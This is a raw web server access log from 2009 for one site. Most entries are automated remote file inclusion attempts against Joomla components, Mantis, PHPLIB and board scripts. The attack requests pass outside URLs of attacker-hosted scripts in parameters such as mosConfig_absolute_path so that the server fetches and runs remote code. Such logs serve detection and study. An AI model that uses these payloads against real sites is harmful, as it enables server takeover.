203.234.62.129 - - [16/Sep/2009:10:20:14 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:20:14 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:20:16 -0700] "GET /logs/access_080228.log//stats/modules/My_eGallery/index.php?basepath=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.134.252.26 - - [16/Sep/2009:10:20:19 -0700] "GET /logs/access_080201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://patx.info/yourvideo/.video/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.134.252.26 - - [16/Sep/2009:10:20:19 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://patx.info/yourvideo/.video/one? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [16/Sep/2009:10:20:21 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
205.134.252.26 - - [16/Sep/2009:10:20:21 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://patx.info/yourvideo/.video/one? HTTP/1.1" 200 19913 "-" "Mozilla/5.0" "www.dmulk.com"
205.134.252.26 - - [16/Sep/2009:10:20:24 -0700] "GET /logs/access_080205.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://patx.info/yourvideo/.video/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:20:36 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:20:36 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:20:36 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:20:41 -0700] "GET /logs/access_080612.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.134.252.26 - - [16/Sep/2009:10:20:49 -0700] "GET /logs/access_080201.log/////?_SERVER[DOCUMENT_ROOT]=http://patx.info/yourvideo/.video/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.134.252.26 - - [16/Sep/2009:10:20:49 -0700] "GET /logs/access_080205.log/////?_SERVER[DOCUMENT_ROOT]=http://patx.info/yourvideo/.video/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:20:52 -0700] "GET /logs/access_090805.log%20%20///skin/ggambo7002_board/basic.php?dir=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:21:18 -0700] "GET /logs/access_080612.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:21:47 -0700] "GET /logs/access_080531.log%20%20//stats/modules/My_eGallery/index.php?basepath=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:21:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:21:49 -0700] "GET /logs/access_080623.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:21:49 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:21:55 -0700] "GET /logs/access_080228.log%20%20//stats/modules/My_eGallery/index.php?basepath=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:21:58 -0700] "GET /logs/access_080819.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:22:03 -0700] "GET /logs/access_070624.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:22:14 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:22:14 -0700] "GET /logs/access_080623.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:22:14 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:22:52 -0700] "GET /logs/access_071015.log HTTP/1.0" 200 23717 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:23:00 -0700] "GET /logs/access_080109.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:23:03 -0700] "GET /results?q=impex/ImpExData.php%3Fsystempath%3D&num=10&um=1&ie=UTF-8&sa=N&hl=en&tab=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:23:03 -0700] "GET /logs//results?q=impex/ImpExData.php%3Fsystempath%3D&num=10&um=1&ie=UTF-8&sa=N&hl=en&tab=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:23:03 -0700] "GET /logs/access_080827.log%20%20//results?q=impex/ImpExData.php%3Fsystempath%3D&num=10&um=1&ie=UTF-8&sa=N&hl=en&tab=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:23:06 -0700] "GET /logs/access_080819.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:23:08 -0700] "GET /logs/access_080617.log%20%20//results?q=impex/ImpExData.php%3Fsystempath%3D&num=10&um=1&ie=UTF-8&sa=N&hl=en&tab=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:23:17 -0700] "GET /logs/access_080330.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:10:23:21 -0700] "GET /logs/access_080623.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:23:40 -0700] "GET /logs/access_090803.log HTTP/1.0" 200 2863730 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:24:43 -0700] "GET /senetman/html/index.php?page=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:24:43 -0700] "GET /logs//senetman/html/index.php?page=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:24:43 -0700] "GET /logs/access_080826.log%20%20//senetman/html/index.php?page=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:24:45 -0700] "GET /logs/access_080201.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:24:45 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:24:45 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:24:46 -0700] "GET /logs/access_080205.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:24:58 -0700] "GET /logs/access_080826.log//senetman/html/index.php?page=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:25:22 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:25:22 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 200 117496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:25:24 -0700] "GET /logs/access_080126.log HTTP/1.0" 200 758621 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:25:26 -0700] "GET /logs/access_090729.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:25:37 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:25:37 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:25:37 -0700] "GET /logs/access_080623.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:25:44 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:25:44 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:25:44 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:25:44 -0700] "GET /logs/access_081120.log//?_PHPLIB[libdir]=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.169.175.226 - - [16/Sep/2009:10:25:47 -0700] "GET /mantis/login_page.php?g_meta_include_file=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.169.175.226 - - [16/Sep/2009:10:25:47 -0700] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:26:02 -0700] "GET /logs/access_080623.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:26:05 -0700] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:26:16 -0700] "GET /logs/access_090901.log%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:26:17 -0700] "GET /logs/access_080827.log//results?q=impex/ImpExData.php%3Fsystempath%3D&num=10&um=1&ie=UTF-8&sa=N&hl=en&tab=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:26:17 -0700] "GET /logs/access_080617.log//results?q=impex/ImpExData.php%3Fsystempath%3D&num=10&um=1&ie=UTF-8&sa=N&hl=en&tab=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:26:17 -0700] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 117471 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:26:18 -0700] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 19926 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:10:26:19 -0700] "GET /logs/access_080819.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:26:28 -0700] "GET /logs/access_080819.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:27:32 -0700] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 19925 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:27:33 -0700] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 117471 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:27:34 -0700] "GET /logs/access_090901.log%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:27:52 -0700] "GET /logs/access_090806.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:27:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:27:58 -0700] "GET /logs/access_080623.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:27:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:28:02 -0700] "GET /logs/access_081012.log//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:28:02 -0700] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117500 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [16/Sep/2009:10:28:03 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:28:03 -0700] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:28:06 -0700] "GET /logs/access_070702.log HTTP/1.0" 200 2893 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:28:44 -0700] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 19925 "-" "Mozilla/5.0" "www.dmulk.com"
93.158.147.244 - - [16/Sep/2009:10:28:44 -0700] "HEAD /sitemap.xml HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:28:44 -0700] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 200 117471 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:28:44 -0700] "GET /logs/access_090901.log%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:28:51 -0700] "GET /logs/access_080623.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:28:53 -0700] "GET /logs/access_080819.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:29:23 -0700] "GET /logs/access_090213.log//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:29:23 -0700] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117500 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:29:23 -0700] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:29:33 -0700] "GET /logs/access_090213.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:29:33 -0700] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117500 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:29:33 -0700] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:29:38 -0700] "GET /logs/access_080330.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:30:14 -0700] "GET /logs/access_081225.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:30:17 -0700] "GET /logs/access_080716.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:30:17 -0700] "GET /logs/access_090901.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:30:17 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 200 19918 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:10:30:18 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 200 117498 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:30:22 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:30:22 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:30:26 -0700] "GET /logs/access_080313.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:30:41 -0700] "GET /logs/access_080327.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:30:41 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:30:41 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:30:43 -0700] "GET /logs/access_080808.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:30:43 -0700] "GET /logs/access_080812.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:30:46 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:30:46 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:30:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:30:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:30:51 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:30:52 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
